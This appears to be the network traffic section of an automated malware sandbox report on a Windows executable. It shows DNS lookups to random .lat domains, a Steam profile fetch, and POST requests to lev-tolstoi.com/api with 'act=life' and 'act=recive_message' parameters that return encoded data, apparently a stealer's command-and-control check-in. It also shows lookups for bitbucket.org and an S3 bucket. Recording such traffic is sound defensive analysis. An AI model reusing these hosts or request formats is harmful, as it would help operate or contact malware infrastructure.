                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.428034067 CET192.168.2.111.1.1.10x3cd9Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.569422960 CET192.168.2.111.1.1.10xfdfeStandard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.727425098 CET192.168.2.111.1.1.10x628bStandard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.867809057 CET192.168.2.111.1.1.10xde01Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.009021044 CET192.168.2.111.1.1.10x8bedStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:39.643023968 CET192.168.2.111.1.1.10x367Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:01.604849100 CET192.168.2.111.1.1.10xa5a2Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:03.825937033 CET192.168.2.111.1.1.10x6ca5Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.655051947 CET1.1.1.1192.168.2.110xed50Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.855979919 CET1.1.1.1192.168.2.110xbf46Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.138312101 CET1.1.1.1192.168.2.110x5d09Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.282260895 CET1.1.1.1192.168.2.110x39bfName error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.426251888 CET1.1.1.1192.168.2.110xfa68Name error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.566272020 CET1.1.1.1192.168.2.110x3cd9Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.707509041 CET1.1.1.1192.168.2.110xfdfeName error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.866034985 CET1.1.1.1192.168.2.110x628bName error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.005785942 CET1.1.1.1192.168.2.110xde01Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.145844936 CET1.1.1.1192.168.2.110x8bedNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:39.780579090 CET1.1.1.1192.168.2.110x367No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:39.780579090 CET1.1.1.1192.168.2.110x367No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:01.743938923 CET1.1.1.1192.168.2.110xa5a2No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:01.743938923 CET1.1.1.1192.168.2.110xa5a2No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:01.743938923 CET1.1.1.1192.168.2.110xa5a2No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com52.216.152.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com52.217.175.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com52.216.92.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com52.217.191.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com52.217.135.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com16.182.34.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com54.231.135.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET1.1.1.1192.168.2.110x6ca5No error (0)s3-w.us-east-1.amazonaws.com52.217.135.161A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                        • lev-tolstoi.com
                                                                                                                                                                                                                                                                        • bitbucket.org
                                                                                                                                                                                                                                                                        • bbuseruploads.s3.amazonaws.com

                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.114970923.55.153.1064437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:38 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:39 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:39 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=4790888d927cfbd005b1b466; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                        2024-12-23 07:40:39 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                        2024-12-23 07:40:39 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                        2024-12-23 07:40:39 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.1149715104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:40 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:40 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        2024-12-23 07:40:41 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:41 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=67kv1si64tdjpa0pnv351ep0h1; expires=Fri, 18 Apr 2025 01:27:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGe3QkjrhNi5QhEQxxHLBa9OyHnSfpkmf%2F1Xy0cbTAr8sNmERQQ31NorAB4qOxH3pHEANtRKgBn8NYfbekxoVdMuznE8mUOEDQ08myNSRHDRWqsX6WGoZzHlAJf5nbg8JTo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b475e81cc434-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1485&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1897335&cwnd=196&unsent_bytes=0&cid=4d9bbba3a6e4adbc&ts=755&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:40:41 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-23 07:40:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.1149721104.21.66.864437428C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-23 07:40:42 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-23 07:40:42 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:43 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=aq5k6ch7vhpv0989muk4j80qsq; expires=Fri, 18 Apr 2025 01:27:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MMVSlJAIq%2B7JRLOpEPhRhGNTDAw66ra3FLPSpLU9D4pnbmud%2BbVDza5YU35up80CPy5AzLarW2vJmCNVE1fl9TIHAt12isfsCqPPZwfH33%2FH%2FaPbGPM2%2FmUDHRajXeF2aE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66b4825a2f423e-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2110&min_rtt=2110&rtt_var=791&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1383230&cwnd=197&unsent_bytes=0&cid=363e269f5ca74aa9&ts=1065&x=0"
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC241INData Raw: 31 63 63 31 0d 0a 32 38 53 30 78 61 31 34 6e 41 2b 34 46 47 35 7a 44 6a 4c 4a 2b 53 2b 74 49 65 38 72 43 42 59 43 30 76 41 43 57 48 31 70 2f 54 61 67 35 73 4c 6e 6c 30 79 77 4c 63 74 78 54 45 6c 36 51 4c 79 63 41 34 39 41 69 77 6b 79 63 47 4f 2b 67 32 64 30 58 78 2b 51 46 4f 47 69 31 61 6e 65 48 62 41 74 33 57 78 4d 53 56 56 4a 36 35 78 42 6a 78 76 4e 54 6d 4a 30 59 37 36 53 59 7a 4d 53 47 5a 46 56 73 36 6a 54 72 63 67 62 2b 47 37 55 65 51 73 57 61 31 4f 6a 6c 30 62 41 53 59 49 4a 4a 44 52 6e 71 4e 49 34 65 6a 41 4d 69 56 65 57 70 63 65 75 6a 77 57 77 64 4a 70 78 41 46 45 30 45 4b 69 63 54 63 46 48 69 30 42 67 66 6d 71 32 6b 32 59 79 44 51 43 62 58 72 4f 6d 30 4b 7a 43 45 75 78 6a 33 6e 34 41 45 47 46 54 36 39 55
                                                                                                                                                                                                                                                                        Data Ascii: 1cc128S0xa14nA+4FG5zDjLJ+S+tIe8rCBYC0vACWH1p/Tag5sLnl0ywLctxTEl6QLycA49AiwkycGO+g2d0Xx+QFOGi1aneHbAt3WxMSVVJ65xBjxvNTmJ0Y76SYzMSGZFVs6jTrcgb+G7UeQsWa1Ojl0bASYIJJDRnqNI4ejAMiVeWpceujwWwdJpxAFE0EKicTcFHi0Bgfmq2k2YyDQCbXrOm0KzCEuxj3n4AEGFT69U
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 4e 79 46 76 4e 45 53 6f 6e 55 72 4f 44 63 53 38 53 47 35 6b 55 70 75 6a 50 35 38 67 57 76 6a 57 61 66 67 41 66 61 56 4f 6b 6e 45 7a 50 55 59 4a 4a 61 58 78 6f 74 4a 68 76 4e 52 41 46 6c 56 4f 78 72 39 47 6f 79 42 4c 34 59 74 6b 32 51 6c 46 72 53 4f 76 44 44 65 39 54 6a 6b 70 2b 65 58 48 77 6a 53 34 6a 58 77 79 54 46 4f 48 6d 30 4b 6e 4f 46 2f 35 2f 30 6e 30 48 46 48 35 62 6f 70 5a 41 7a 30 36 48 52 6d 6c 30 5a 37 71 59 62 7a 41 62 42 70 4a 53 75 61 61 57 36 59 38 64 35 69 32 43 4e 69 38 55 66 46 65 6e 6a 51 2f 31 41 35 49 48 63 7a 52 6e 76 4e 49 34 65 68 63 4f 6e 46 65 79 71 64 57 76 78 41 6a 2b 66 39 78 37 43 51 4e 71 56 61 57 52 54 74 31 4a 67 30 39 70 66 57 75 35 6c 32 63 2b 58 30 58 66 55 36 48 6d 6a 75 66 75 46 2f 56 68 30 47 45 4d 55 58 4d 65 73 74
                                                                                                                                                                                                                                                                        Data Ascii: NyFvNESonUrODcS8SG5kUpujP58gWvjWafgAfaVOknEzPUYJJaXxotJhvNRAFlVOxr9GoyBL4Ytk2QlFrSOvDDe9Tjkp+eXHwjS4jXwyTFOHm0KnOF/5/0n0HFH5bopZAz06HRml0Z7qYbzAbBpJSuaaW6Y8d5i2CNi8UfFenjQ/1A5IHczRnvNI4ehcOnFeyqdWvxAj+f9x7CQNqVaWRTt1Jg09pfWu5l2c+X0XfU6HmjufuF/Vh0GEMUXMest
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 68 30 39 6c 65 57 7a 77 33 43 41 39 42 30 76 48 46 4a 4f 6c 77 71 54 46 57 4d 74 75 31 48 67 4c 42 79 78 50 35 59 49 4e 79 45 2f 4e 45 53 70 35 59 62 69 55 63 6a 55 53 43 4a 46 61 74 71 50 5a 72 38 38 61 38 32 6a 65 66 51 63 53 59 56 53 35 6b 55 33 48 52 6f 78 44 59 44 51 75 38 4a 56 34 65 6b 64 4c 72 6b 4f 79 35 4f 4f 6b 77 52 54 35 65 35 70 70 51 67 67 73 56 36 66 62 46 59 39 4f 68 55 78 76 65 32 47 36 6e 47 55 77 45 77 4f 52 56 36 75 70 30 71 66 44 45 76 52 67 31 48 49 45 47 47 64 62 72 5a 74 4d 78 51 50 44 43 57 31 73 49 4f 6a 53 56 44 30 54 42 70 41 57 6a 4b 58 59 71 63 67 4d 76 6e 4b 55 62 30 77 57 59 42 44 7a 32 30 48 47 51 34 5a 44 62 6e 52 6e 76 5a 64 6a 50 52 77 47 6d 46 36 33 6f 64 4b 72 78 68 66 34 62 64 31 79 43 51 4e 70 57 61 65 58 44 59 45
                                                                                                                                                                                                                                                                        Data Ascii: h09leWzw3CA9B0vHFJOlwqTFWMtu1HgLByxP5YINyE/NESp5YbiUcjUSCJFatqPZr88a82jefQcSYVS5kU3HRoxDYDQu8JV4ekdLrkOy5OOkwRT5e5ppQggsV6fbFY9OhUxve2G6nGUwEwORV6up0qfDEvRg1HIEGGdbrZtMxQPDCW1sIOjSVD0TBpAWjKXYqcgMvnKUb0wWYBDz20HGQ4ZDbnRnvZdjPRwGmF63odKrxhf4bd1yCQNpWaeXDYE
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 54 70 35 38 4a 56 73 65 6b 64 4c 6c 6c 32 72 71 4e 69 75 77 68 7a 32 61 74 52 37 42 78 64 6e 56 36 79 64 51 4d 64 4f 69 45 70 72 63 47 71 69 6b 57 73 77 45 67 48 66 47 76 6d 68 7a 75 65 58 57 74 6c 68 38 32 59 58 41 33 6f 51 74 4e 56 55 6a 30 53 42 43 54 49 30 59 37 2b 62 62 7a 49 58 42 4a 42 51 74 36 44 51 71 73 6f 56 39 48 2f 53 65 41 45 61 59 31 75 35 6d 30 44 4c 54 34 6c 42 59 58 34 67 2f 74 4a 6e 49 6c 39 54 33 32 47 30 71 64 61 6b 32 56 72 68 49 38 4d 32 43 78 30 73 43 4f 75 58 51 38 39 4d 67 55 56 68 66 47 47 38 6e 47 63 2f 46 67 4f 58 52 72 69 69 33 71 62 42 46 66 39 70 33 33 4d 49 46 6d 68 57 70 4e 73 44 6a 30 53 56 43 54 49 30 54 35 65 6e 49 68 73 6c 53 34 41 61 6f 4f 62 52 71 34 39 43 76 6d 48 5a 65 67 51 65 61 6c 6d 6e 6b 55 54 45 54 34 5a 4e
                                                                                                                                                                                                                                                                        Data Ascii: Tp58JVsekdLll2rqNiuwhz2atR7BxdnV6ydQMdOiEprcGqikWswEgHfGvmhzueXWtlh82YXA3oQtNVUj0SBCTI0Y7+bbzIXBJBQt6DQqsoV9H/SeAEaY1u5m0DLT4lBYX4g/tJnIl9T32G0qdak2VrhI8M2Cx0sCOuXQ89MgUVhfGG8nGc/FgOXRrii3qbBFf9p33MIFmhWpNsDj0SVCTI0T5enIhslS4AaoObRq49CvmHZegQealmnkUTET4ZN
                                                                                                                                                                                                                                                                        2024-12-23 07:40:44 UTC1369INData Raw: 57 64 59 54 73 5a 47 5a 68 64 71 36 6a 62 71 4d 63 53 39 32 7a 65 63 77 45 58 59 46 71 71 6e 45 50 42 53 38 30 48 4b 6e 4e 34 38 4d 6f 67 47 77 38 51 6a 55 4b 30 68 39 75 6f 6a 77 57 77 64 4a 70 78 41 46 45 30 45 4b 4b 4a 53 63 4a 52 68 45 35 6b 65 32 4f 69 6b 32 30 78 44 51 79 51 55 4c 36 71 30 4b 6a 4a 47 2f 74 6e 31 6e 45 4a 47 6d 4e 63 36 39 55 4e 79 46 76 4e 45 53 70 61 61 36 4f 46 59 7a 51 55 48 59 51 55 70 75 6a 50 35 38 67 57 76 6a 57 61 64 51 63 61 61 46 43 6e 6d 30 6e 43 51 35 39 47 62 58 4e 70 75 34 42 71 50 52 67 41 6c 31 2b 32 6f 4d 53 72 77 51 6a 37 66 38 67 32 51 6c 46 72 53 4f 76 44 44 66 6c 45 6e 56 6c 70 4e 6c 47 6d 6b 58 59 78 45 67 66 66 53 2f 65 2f 6c 71 44 44 57 71 59 74 33 48 6b 46 45 6d 4e 52 6f 70 64 41 79 6b 71 49 53 47 78 77 61
                                                                                                                                                                                                                                                                        Data Ascii: WdYTsZGZhdq6jbqMcS92zecwEXYFqqnEPBS80HKnN48MogGw8QjUK0h9uojwWwdJpxAFE0EKKJScJRhE5ke2Oik20xDQyQUL6q0KjJG/tn1nEJGmNc69UNyFvNESpaa6OFYzQUHYQUpujP58gWvjWadQcaaFCnm0nCQ59GbXNpu4BqPRgAl1+2oMSrwQj7f8g2QlFrSOvDDflEnVlpNlGmkXYxEgffS/e/lqDDWqYt3HkFEmNRopdAykqISGxwa
